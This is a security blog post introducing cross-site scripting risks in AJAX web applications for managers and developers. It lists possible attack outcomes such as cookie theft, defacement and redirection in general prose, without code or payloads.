- Tools & Templates
- Security Jobs
- Data Protection
- Identity & Access
- Business Continuity
- Physical Security
- Security Leadership
XSS: The Spark to the AJAX Dynamite
This entry should serve as an introduction to the threat of cross site scripting and how they can be exacerbated by the use of AJAX. This is the first part of a multipart series where I will detail the numerous vulnerabilities that can lead to severe XSS-AJAX vulnerabilities.
You should follow this multipart series closely if you are manager or overseer of a team that is currently, or will be, working on a web application with AJAX components. If you’re considering moving your current client server application to be a web application the following blog entries will be integral to understanding the threats associated with web applications leveraging the AJAX technologies. This will allow you to make more secure decisions when designing the system.
On my last attendance to the Blackhat and Defcon security conferences I was surprised to see how far the simple Cross Site Scripting vulnerabilities have come. The methods of finding and exploiting these vulnerabilities as well as the possible payloads have come so far in the last year that many testers, developers, project managers and CSO don’t know how powerful a security problem this can be.
The popularity of AJAX is unnecessarily increasing the attack surface of many web applications. It hides what is going on from the user and creates an easily scriptable interface to the core functionality of the web application.
Leveraging new technologies with misconfigured and vulnerable web applications malicious users can script much of the web browsing experience to attack the user browsing on a trusted website. These attacks include, but are not limited to the following:
- Stealing cookies – one of the early attacks was to steal a user’s browser cookie, which may contain sensitive data or session IDs. Once an attacker has a session ID they can log in to the target site without proper credentials as the victim user
- Retrieving web contents – with AJAX technologies an attacker can steal web page data from the same domain “behind the scenes” of the page that the victim is currently viewing. This is especially interesting when browsing sites that may have a lot of content that is only a click away such as webmail or document sharing sites
- Defacement – as the attacker controls the code on the site, they can effectively float any contents over the page they would like.
- Redirection – the attacker can forcefully browse the victim to any site or page
- Real time spying – by posting to a remote site the attacker can actively spy on the victim’s browser watching them browse from page to page, and to see every page they view and everything they type.
If you have any specific worries or vulnerabilities you'd like me to address in the coming weeks, please post them in the comments and I'll respond in my future entries or the comments section. This is going to be an exciting number of weeks!
Thanks to cloud computing, your business data is everywhere and being accessed by everyone. Making the wrong decision to protect your data can result in high costs, increased risk and executive exposure. View this live webinar on cloud security and the evolving data center, and learn why a data-centric approach to security is the best bet for today's virtual environment.
- Redefine Business Portability
- Prevent Mobile Devices from Loading Dangerous Code
- Expanding Your Security Perimeter: Common Sense for Navigating Today's Threat Landscape
- Fighting Fraud Videos: IBM Intelligent Investigation Manager
- IBM Intelligent Investigation Manager: Online Product Demo
- Webinar: IBM IIM for Fraud, Abuse and Waste in Government